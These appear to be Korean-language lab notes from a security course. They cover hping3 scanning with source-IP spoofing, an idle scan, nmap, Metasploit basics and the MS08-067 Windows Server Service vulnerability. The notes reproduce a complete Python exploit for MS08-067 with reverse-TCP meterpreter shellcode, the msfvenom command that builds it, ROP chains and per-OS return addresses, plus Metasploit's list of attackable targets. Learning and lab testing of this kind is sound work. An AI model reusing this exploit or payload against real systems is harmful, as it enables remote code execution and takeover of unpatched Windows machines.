  -8  --scan       SCAN mode.
                   Example: hping --scan 1-30,70-90 -S www.target.host
  -9  --listen     listen mode
IP
  -a  --spoof      spoof source address
  --rand-dest      random destionation address mode. see the man.
  --rand-source    random source address mode. see the man.
  -t  --ttl        ttl (default 64)
  -N  --id         id (default random)
  -W  --winid      use win* id byte ordering
  -r  --rel        relativize id field          (to estimate host traffic)
  -f  --frag       split packets in more frag.  (may pass weak acl)
  -x  --morefrag   set more fragments flag
  -y  --dontfrag   set don't fragment flag
  -g  --fragoff    set the fragment offset
  -m  --mtu        set virtual mtu, implies --frag if packet size > mtu
  -o  --tos        type of service (default 0x00), try --tos help
  -G  --rroute     includes RECORD_ROUTE option and display the route buffer
  --lsrr           loose source routing and record route
  --ssrr           strict source routing and record route
  -H  --ipproto    set the IP protocol field, only in RAW IP mode
ICMP
  -C  --icmptype   icmp type (default echo request)
  -K  --icmpcode   icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)
      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help  display help for others icmp options
UDP/TCP
  -s  --baseport   base source port             (default random)
  -p  --destport   [+][+]<port> destination port(default 0) ctrl+z inc/dec
  -k  --keep       keep still source port
  -w  --win        winsize (default 64)
  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
  -Q  --seqnum     shows only tcp sequence number
  -b  --badcksum   (try to) send packets with a bad IP checksum
                   many systems will fix the IP checksum sending the packet
                   so you'll get bad UDP/TCP checksum instead.
  -M  --setseq     set TCP sequence number
  -L  --setack     set TCP ack
  -F  --fin        set FIN flag
  -S  --syn        set SYN flag
  -R  --rst        set RST flag
  -P  --push       set PUSH flag
  -A  --ack        set ACK flag
  -U  --urg        set URG flag
  -X  --xmas       set X unused flag (0x40)
  -Y  --ymas       set Y unused flag (0x80)
  --tcpexitcode    use last tcp->th_flags as exit code
  --tcp-mss        enable the TCP MSS option with the given value
  --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
Common
  -d  --data       data size                    (default is 0)
  -E  --file       data from file
  -e  --sign       add 'signature'
  -j  --dump       dump packets in hex
  -J  --print      dump printable characters
  -B  --safe       enable 'safe' protocol
  -u  --end        tell you when --file reached EOF and prevent rewind
  -T  --traceroute traceroute mode              (implies --bind and --ttl 1)
  --tr-stop        Exit when receive the first not ICMP in traceroute mode
  --tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop
  --tr-no-rtt	    Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
  --apd-send       Send the packet described with APD (see docs/APD.txt)


기본 tcp 통신
포트 지정하지 않으면 목적지 포트가 0번 포트로 통신을 요청한다.
기본 플래그 Null (플래그 설정 안된 상태에서 통신 요청)

1. hping3 테스트
hping3 몸풀기
[root@victim3 ~]# systemctl stop firewalld
[root@victim3 ~]# iptables -F

80번 포트로 들어오는 패킷을 모니터링 한다.
-i ens33: 인터페이스 ens33 
port 80: 80번 포트 
-nn: 숫자 출력, 첫 번째 n: IP주소를 숫자로 변경, 두 번째 n: 포트 번호를 숫자로 변경
[root@victim3 ~]# tcpdump -i ens33 port 80 -nn

-c 10: count 10개 
-S: SYN 
-p 80: 80번 포트
200.200.200.6: Target
[root@kali ~]# hping3 -c 10 -S -p 80 200.200.200.6
HPING 200.200.200.6 (eth0 200.200.200.6): S set, 40 headers + 0 data bytes
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=0 win=29200 rtt=3.9 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=1 win=29200 rtt=6.9 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=2 win=29200 rtt=11.4 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=3 win=29200 rtt=6.9 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=4 win=29200 rtt=0.9 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=5 win=29200 rtt=4.0 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=6 win=29200 rtt=7.2 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=7 win=29200 rtt=3.0 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=8 win=29200 rtt=5.2 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=9 win=29200 rtt=12.0 ms

--- 200.200.200.6 hping statistic ---
10 packets transmitted, 10 packets received, 0% packet loss
round-trip min/avg/max = 0.9/6.1/12.0 ms

2. IDLE 스캔

첫 번째: ID 모니터링
-r: IDLE 

-r 옵션을 이용하면 NULL 스캔처럼 Flags 를 설정하지 않고 패킷을 전송한다.
[root@kali hping3]# hping3 -r 200.200.200.6
[root@victim3 ~]# tcpdump -i ens33 not port 22 -nn 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
22:39:23.987507 IP 200.200.200.3.2990 > 200.200.200.6.0: Flags [none], win 512, length 0
22:39:23.987545 IP 200.200.200.6.0 > 200.200.200.3.2990: Flags [R.], seq 0, ack 1912185696, win 0, length 0
22:39:25.071691 IP 200.200.200.3.2991 > 200.200.200.6.0: Flags [none], win 512, length 0
22:39:25.071783 IP 200.200.200.6.0 > 200.200.200.3.2991: Flags [R.], seq 0, ack 1165739149, win 0, length 0
22:39:26.155844 IP 200.200.200.3.2992 > 200.200.200.6.0: Flags [none], win 512, length 0
22:39:26.155889 IP 200.200.200.6.0 > 200.200.200.3.2992: Flags [R.], seq 0, ack 255718478, win 0, length 0
^C

Windows XP의 방화벽을 Off로 끈다.
cmd > firewall.cpl > 사용 안함

[root@kali ~]# hping3 -r 200.200.200.4
HPING 200.200.200.4 (eth0 200.200.200.4): NO FLAGS are set, 40 headers + 0 data bytes
len=46 ip=200.200.200.4 ttl=128 id=949 sport=0 flags=RA seq=0 win=0 rtt=2.9 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1 win=0 rtt=2.4 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=2 win=0 rtt=6.8 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=3 win=0 rtt=5.8 ms
 :
 :(생략)


두 번째: 변조된 패킷 전송(열린 포트 80번으로 전송)
hping3 의 옵션
-S : SYN flag 설정
-A : ACK flag 설정
-p : 도착지 포트
-a : 소스 IP 속이기(Spoofing)
-r : id 모니터링 
-c : 패킷 카운트

[root@victim3 ~]# systemctl start httpd

[root@kali ~]# hping3 -p 80 -S -c 1 -a 200.200.200.4 200.200.200.6



RST가 victim3에서 전송한 후 다음 번호로 출력해서 +2가 표시된다.
[root@kali ~]# hping3 -r 200.200.200.4
  :
  :(생략)
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=553 win=0 rtt=7.5 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=554 win=0 rtt=2.9 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=555 win=0 rtt=1.9 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=556 win=0 rtt=5.0 ms
len=46 ip=200.200.200.4 ttl=128 id=+2 sport=0 flags=RA seq=612 win=0 rtt=3.3 ms  <-- +2 
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=613 win=0 rtt=11.1 ms

nmap 으로 80번 포트가 열려 있는지 확인한다.
[root@kali ~]# nmap -sT -p 80 200.200.200.6
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-04 20:54 EDT
Nmap scan report for 200.200.200.6
Host is up (0.00037s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds

세 번째: 변조된 패킷 전송(열린 포트 8000번으로 전송)
[root@kali ~]# nmap -sT -p 8000 200.200.200.6
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-04 21:08 EDT
Nmap scan report for 200.200.200.6
Host is up (0.00052s latency).

PORT     STATE  SERVICE
8000/tcp closed http-alt
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds

[root@kali ~]# hping3 -p 8000 -S -c 10 -a 200.200.200.4 200.200.200.6
HPING 200.200.200.6 (eth0 200.200.200.6): S set, 40 headers + 0 data bytes

--- 200.200.200.6 hping statistic ---
10 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

victim3에서 +1이 표시된다는 말은 포트가 닫혀 있다는걸 의미한다.
[root@kali ~]# hping3 -r 200.200.200.4
  :
  :(생략)
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1352 win=0 rtt=4.8 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1353 win=0 rtt=3.8 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1354 win=0 rtt=3.5 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1355 win=0 rtt=10.5 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1356 win=0 rtt=9.2 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1357 win=0 rtt=8.7 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1358 win=0 rtt=8.2 ms

네 번째: 와이어샤크 분석
victim1에서 와이어샤크를 이용해서 패킷을 덤프 받아서 분석한다.
패킷을 볼 때 많이 나오므로 filter 부분에 ip.host == 200.200.200.4 로 설정하고 확인한다.
IP헤더에 identification에서 id값을 확인한다.




##############
## metasploit 
##############

[root@kali ~]# msfconsole 

                                   
               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:                                
                                :::::::+:
                      Metasploit

       =[ metasploit v6.2.9-dev                           ]
+ -- --=[ 2230 exploits - 1177 auxiliary - 398 post       ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View advanced module options with 
advanced

msf6 > quit

[root@kali ~]# msfconsole --help
Usage: msfconsole [options]

Common options:
    -E, --environment ENVIRONMENT    Set Rails environment, defaults to RAIL_ENV environment variable or 'production'

Database options:
    -M, --migration-path DIRECTORY   Specify a directory containing additional DB migrations
    -n, --no-database                Disable database support
    -y, --yaml PATH                  Specify a YAML file containing database settings

Framework options:
    -c FILE                          Load the specified configuration file
    -v, -V, --version                Show version

Module options:
        --defer-module-loads         Defer module loading unless explicitly asked
    -m, --module-path DIRECTORY      Load an additional module path

Console options:
    -a, --ask                        Ask before exiting Metasploit or accept 'exit -y'
    -H, --history-file FILE          Save command history to the specified file
    -l, --logger STRING              Specify a logger to use (TimestampColorlessFlatfile, Flatfile, StdoutWithoutTimestamps, Stdout, Stderr)
        --[no-]readline
    -L, --real-readline              Use the system Readline library instead of RbReadline
    -o, --output FILE                Output to the specified file
    -p, --plugin PLUGIN              Load a plugin on startup
    -q, --quiet                      Do not print the banner on startup
    -r, --resource FILE              Execute the specified resource file (- for stdin)
    -x, --execute-command COMMAND    Execute the specified console commands (use ; for multiples)
    -h, --help                       Show this message


[root@kali ~]# msfconsole

       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Enable HTTP request and response logging 
with set HttpTrace true
Metasploit Documentation: https://docs.metasploit.com/


msf6 > help
msf6 > show exploits
msf6 > show payloads
msf6 > help search
msf6 > help info

메타스플로잇 가격
http://www.softwarecatalog.co.kr/src/Item/Itemmaster.aspx?Serial=8004

북한 사이버 공격의 단골 루트, PMS 취약점 도대체 뭐길래?
https://www.boannews.com/media/view.asp?idx=57389

기업 보안의 핵심은 ‘패치 관리’, 왜?
https://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?menu_dist=2&seq=24718

MS 업데이트
- 정기적인 업데이트 (매달 둘 째주 화요일(수요일))
- 비정기적인 업데이트 (긴급 업데이트, 취약점이 나오면 바로 나온다.)

구글: 윈도우 업데이트 부팅 불가 검색

실습> MS08-067

Microsoft 보안 공지 MS08-067 - 긴급

CVE-2008-4250

참고: 
https://docs.microsoft.com/ko-kr/security-updates/SecurityBulletins/2008/MS08-067
https://support.microsoft.com/ko-kr/topic/ms08-067-서버-서비스의-취약성으로-인한-원격-코드-실행-문제-ac7878fc-be69-7143-472d-2507a179cd15


CVE
https://nordvpn.com/ko/blog/cve-explained/

CVE란 ?
https://www.boannews.com/media/view.asp?idx=47656

https://www.exploit-db.com/exploits/40279


[root@kali ~]# vi MS08-067.py
"""
파일명: MS08-067.py
프로그램 설명: MS08-067 취약점 Exploit 코드
python 2 에서 실행한다.
참고: https://www.exploit-db.com/exploits/40279
"""

import struct
import time
import sys

from threading import Thread    #Thread is imported incase you would like to modify
try:
    from impacket import smb
    from impacket import uuid
    from impacket import dcerpc
    from impacket.dcerpc.v5 import transport

except ImportError, _:
    print 'Install the following library to make this script work'
    print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
    print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
    sys.exit(1)

print '#######################################################################'
print '#   MS08-067 Exploit'
print '#   This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).'
print '#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi'
print '#######################################################################\n'

#Reverse TCP shellcode from metasploit; port 443 IP 192.168.40.103; badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40;
#Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes (nopsleps are not included)
#EXITFUNC=thread Important!
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443  EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python
shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x2b\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81"
shellcode += "\x76\x0e\xb7\xdd\x9e\xe0\x83\xee\xfc\xe2\xf4\x4b\x35"
shellcode += "\x1c\xe0\xb7\xdd\xfe\x69\x52\xec\x5e\x84\x3c\x8d\xae"
shellcode += "\x6b\xe5\xd1\x15\xb2\xa3\x56\xec\xc8\xb8\x6a\xd4\xc6"
shellcode += "\x86\x22\x32\xdc\xd6\xa1\x9c\xcc\x97\x1c\x51\xed\xb6"
shellcode += "\x1a\x7c\x12\xe5\x8a\x15\xb2\xa7\x56\xd4\xdc\x3c\x91"
shellcode += "\x8f\x98\x54\x95\x9f\x31\xe6\x56\xc7\xc0\xb6\x0e\x15"
shellcode += "\xa9\xaf\x3e\xa4\xa9\x3c\xe9\x15\xe1\x61\xec\x61\x4c"
shellcode += "\x76\x12\x93\xe1\x70\xe5\x7e\x95\x41\xde\xe3\x18\x8c"
shellcode += "\xa0\xba\x95\x53\x85\x15\xb8\x93\xdc\x4d\x86\x3c\xd1"
shellcode += "\xd5\x6b\xef\xc1\x9f\x33\x3c\xd9\x15\xe1\x67\x54\xda"
shellcode += "\xc4\x93\x86\xc5\x81\xee\x87\xcf\x1f\x57\x82\xc1\xba"
shellcode += "\x3c\xcf\x75\x6d\xea\xb5\xad\xd2\xb7\xdd\xf6\x97\xc4"
shellcode += "\xef\xc1\xb4\xdf\x91\xe9\xc6\xb0\x22\x4b\x58\x27\xdc"
shellcode += "\x9e\xe0\x9e\x19\xca\xb0\xdf\xf4\x1e\x8b\xb7\x22\x4b"
shellcode += "\x8a\xb2\xb5\x5e\x48\xa9\x90\xf6\xe2\xb7\xdc\x25\x69"
shellcode += "\x51\x8d\xce\xb0\xe7\x9d\xce\xa0\xe7\xb5\x74\xef\x68"
shellcode += "\x3d\x61\x35\x20\xb7\x8e\xb6\xe0\xb5\x07\x45\xc3\xbc"
shellcode += "\x61\x35\x32\x1d\xea\xea\x48\x93\x96\x95\x5b\x35\xff"
shellcode += "\xe0\xb7\xdd\xf4\xe0\xdd\xd9\xc8\xb7\xdf\xdf\x47\x28"
shellcode += "\xe8\x22\x4b\x63\x4f\xdd\xe0\xd6\x3c\xeb\xf4\xa0\xdf"
shellcode += "\xdd\x8e\xe0\xb7\x8b\xf4\xe0\xdf\x85\x3a\xb3\x52\x22"
shellcode += "\x4b\x73\xe4\xb7\x9e\xb6\xe4\x8a\xf6\xe2\x6e\x15\xc1"
shellcode += "\x1f\x62\x5e\x66\xe0\xca\xff\xc6\x88\xb7\x9d\x9e\xe0"
shellcode += "\xdd\xdd\xce\x88\xbc\xf2\x91\xd0\x48\x08\xc9\x88\xc2"
shellcode += "\xb3\xd3\x81\x48\x08\xc0\xbe\x48\xd1\xba\x09\xc6\x22"
shellcode += "\x61\x1f\xb6\x1e\xb7\x26\xc2\x1a\x5d\x5b\x57\xc0\xb4"
shellcode += "\xea\xdf\x7b\x0b\x5d\x2a\x22\x4b\xdc\xb1\xa1\x94\x60"
shellcode += "\x4c\x3d\xeb\xe5\x0c\x9a\x8d\x92\xd8\xb7\x9e\xb3\x48"
shellcode += "\x08\x9e\xe0"

nonxjmper = "\x08\x04\x02\x00%s"+"A"*4+"%s"+"A"*42+"\x90"*8+"\xeb\x62"+"A"*10
disableNXjumper = "\x08\x04\x02\x00%s%s%s"+"A"*28+"%s"+"\xeb\x02"+"\x90"*2+"\xeb\x62"
ropjumper = "\x00\x08\x01\x00"+"%s"+"\x10\x01\x04\x01";
module_base = 0x6f880000
def generate_rop(rvas):
	gadget1="\x90\x5a\x59\xc3"
	gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]	
	gadget3="\xcc\x90\xeb\x5a"	
	ret=struct.pack('<L', 0x00018000)
	ret+=struct.pack('<L', rvas['call_HeapCreate']+module_base)
	ret+=struct.pack('<L', 0x01040110)
	ret+=struct.pack('<L', 0x01010101)
	ret+=struct.pack('<L', 0x01010101)
	ret+=struct.pack('<L', rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret']+module_base)
	ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)
	ret+=gadget1
	ret+=struct.pack('<L', rvas['mov [eax], ecx / ret']+module_base)
	ret+=struct.pack('<L', rvas['jmp eax']+module_base)
	ret+=gadget2[0]
	ret+=gadget2[1]
	ret+=struct.pack('<L', rvas['mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret']+module_base)
	ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)
	ret+=gadget2[2]
	ret+=struct.pack('<L', rvas['mov [eax+0x10], ecx / ret']+module_base)
	ret+=struct.pack('<L', rvas['add eax, 8 / ret']+module_base)
	ret+=struct.pack('<L', rvas['jmp eax']+module_base)
	ret+=gadget3	
	return ret
class SRVSVC_Exploit(Thread):
    def __init__(self, target, os, port=445):
        super(SRVSVC_Exploit, self).__init__()
        self.__port   = port
        self.target   = target
	    self.os	      = os


    def __DCEPacket(self):
	if (self.os=='1'):
		print 'Windows XP SP0/SP1 Universal\n'
		ret = "\x61\x13\x00\x01"
		jumper = nonxjmper % (ret, ret)
	elif (self.os=='2'):
		print 'Windows 2000 Universal\n'
		ret = "\xb0\x1c\x1f\x00"
		jumper = nonxjmper % (ret, ret)
	elif (self.os=='3'):
		print 'Windows 2003 SP0 Universal\n'
		ret = "\x9e\x12\x00\x01"  #0x01 00 12 9e
		jumper = nonxjmper % (ret, ret)
	elif (self.os=='4'):
		print 'Windows 2003 SP1 English\n'
		ret_dec = "\x8c\x56\x90\x7c"  #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
		ret_pop = "\xf4\x7c\xa2\x7c"  #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
		jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
		disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL
		jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2)
	elif (self.os=='5'):
		print 'Windows XP SP3 French (NX)\n'
		ret = "\x07\xf8\x5b\x59"  #0x59 5b f8 07 
		disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2 
		jumper = nonxjmper % (disable_nx, ret)  #the nonxjmper also work in this case.
	elif (self.os=='6'):
		print 'Windows XP SP3 English (NX)\n'
		ret = "\x07\xf8\x88\x6f"  #0x6f 88 f8 07 
		disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2 
		jumper = nonxjmper % (disable_nx, ret)  #the nonxjmper also work in this case.
	elif (self.os=='7'):
		print 'Windows XP SP3 English (AlwaysOn NX)\n'
		rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64}
		jumper = generate_rop(rvasets)+"AB"  #the nonxjmper also work in this case.
	else:
		print 'Not supported OS version\n'
		sys.exit(-1)
	print '[-]Initiating connection'

        self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
        self.__trans.connect()
        print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))

        path ="\x5c\x00"+"ABCDEFGHIJ"*10 + shellcode +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00"  + jumper + "\x00" * 2

        server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
        prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"

        self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00"

        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub) 
        time.sleep(5)
        print 'Exploit finish\n'

if __name__ == '__main__':
       try:
           target = sys.argv[1]
	   os = sys.argv[2]
       except IndexError:
				print '\nUsage: %s <target ip>\n' % sys.argv[0]
				print 'Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\n'
				print 'Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\n'
				sys.exit(-1)

current = SRVSVC_Exploit(target, os)
current.start()


[root@kali ~]# msfconsole

msf6 > search ms08_067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 > info exploit/windows/smb/ms08_067_netapi 

       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption   <-- 모듈을 설명하는 이름
     Module: exploit/windows/smb/ms08_067_netapi  <-- 모듈명
   Platform: Windows  <-- 플랫폼은 이 공격이 윈도우 시스템에 해당되는 것을 의미한다.
       Arch: 
 Privileged: Yes  <-- 이 공격이 성공했을 때 목표 시스템에 대한 권한을 얻게 되는지 알려준다.
    License: Metasploit Framework License (BSD)
       Rank: Great   <-- 순위는 이 공격으로 인하여 목표 시스템이 받게 되는 잠재적인 영향을 목록화한다.
  Disclosed: 2008-10-28  <-- 공개된 날짜

Provided by:  <-- 제공된 사람들
  hdm <x@hdm.io>
  Brett Moore <brett.moore@insomniasec.com>
  frank2 <frank2@dc949.org>
  jduck <jduck@metasploit.com>

Available targets:    <-- 가용 목표는 해당 모듈이 공략할 수 있는 OS버전과 패치 레벨을 목록화한다. 
  Id  Name                총 81개의 공격 가능한 목표를 갖고 있다.
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows 2003 SP0 Universal
  4   Windows XP SP2 English (AlwaysOn NX)
  5   Windows XP SP2 English (NX)
  6   Windows XP SP3 English (AlwaysOn NX)
  7   Windows XP SP3 English (NX)
  8   Windows XP SP2 Arabic (NX)
  9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  10  Windows XP SP2 Chinese - Simplified (NX)
  11  Windows XP SP2 Chinese - Traditional (NX)
  12  Windows XP SP2 Czech (NX)
  13  Windows XP SP2 Danish (NX)
  14  Windows XP SP2 German (NX)
  15  Windows XP SP2 Greek (NX)
  16  Windows XP SP2 Spanish (NX)
  17  Windows XP SP2 Finnish (NX)
  18  Windows XP SP2 French (NX)
  19  Windows XP SP2 Hebrew (NX)
  20  Windows XP SP2 Hungarian (NX)
  21  Windows XP SP2 Italian (NX)
  22  Windows XP SP2 Japanese (NX)
  23  Windows XP SP2 Korean (NX)
  24  Windows XP SP2 Dutch (NX)
  25  Windows XP SP2 Norwegian (NX)
  26  Windows XP SP2 Polish (NX)
  27  Windows XP SP2 Portuguese - Brazilian (NX)
  28  Windows XP SP2 Portuguese (NX)
  29  Windows XP SP2 Russian (NX)
  30  Windows XP SP2 Swedish (NX)
  31  Windows XP SP2 Turkish (NX)
  32  Windows XP SP3 Arabic (NX)
  33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  34  Windows XP SP3 Chinese - Simplified (NX)
  35  Windows XP SP3 Chinese - Traditional (NX)
  36  Windows XP SP3 Czech (NX)
  37  Windows XP SP3 Danish (NX)
  38  Windows XP SP3 German (NX)
  39  Windows XP SP3 Greek (NX)
  40  Windows XP SP3 Spanish (NX)
  41  Windows XP SP3 Finnish (NX)
  42  Windows XP SP3 French (NX)
  43  Windows XP SP3 Hebrew (NX)
  44  Windows XP SP3 Hungarian (NX)
  45  Windows XP SP3 Italian (NX)
  46  Windows XP SP3 Japanese (NX)
  47  Windows XP SP3 Korean (NX)      <-- Victim1의 OS에 해당된다.
  48  Windows XP SP3 Dutch (NX)
  49  Windows XP SP3 Norwegian (NX)
  50  Windows XP SP3 Polish (NX)
  51  Windows XP SP3 Portuguese - Brazilian (NX)
  52  Windows XP SP3 Portuguese (NX)
  53  Windows XP SP3 Russian (NX)
  54  Windows XP SP3 Swedish (NX)
  55  Windows XP SP3 Turkish (NX)
  56  Windows 2003 SP1 English (NO NX)
  57  Windows 2003 SP1 English (NX)
  58  Windows 2003 SP1 Japanese (NO NX)
  59  Windows 2003 SP1 Spanish (NO NX)
  60  Windows 2003 SP1 Spanish (NX)
  61  Windows 2003 SP1 French (NO NX)
  62  Windows 2003 SP1 French (NX)
  63  Windows 2003 SP2 English (NO NX)
  64  Windows 2003 SP2 English (NX)
  65  Windows 2003 SP2 German (NO NX)
  66  Windows 2003 SP2 German (NX)
  67  Windows 2003 SP2 Portuguese (NX)
  68  Windows 2003 SP2 Portuguese - Brazilian (NX)
  69  Windows 2003 SP2 Spanish (NO NX)
  70  Windows 2003 SP2 Spanish (NX)
  71  Windows 2003 SP2 Japanese (NO NX)
  72  Windows 2003 SP2 French (NO NX)
  73  Windows 2003 SP2 French (NX)
  74  Windows 2003 SP2 Chinese - Simplified (NX)
  75  Windows 2003 SP2 Czech (NX)
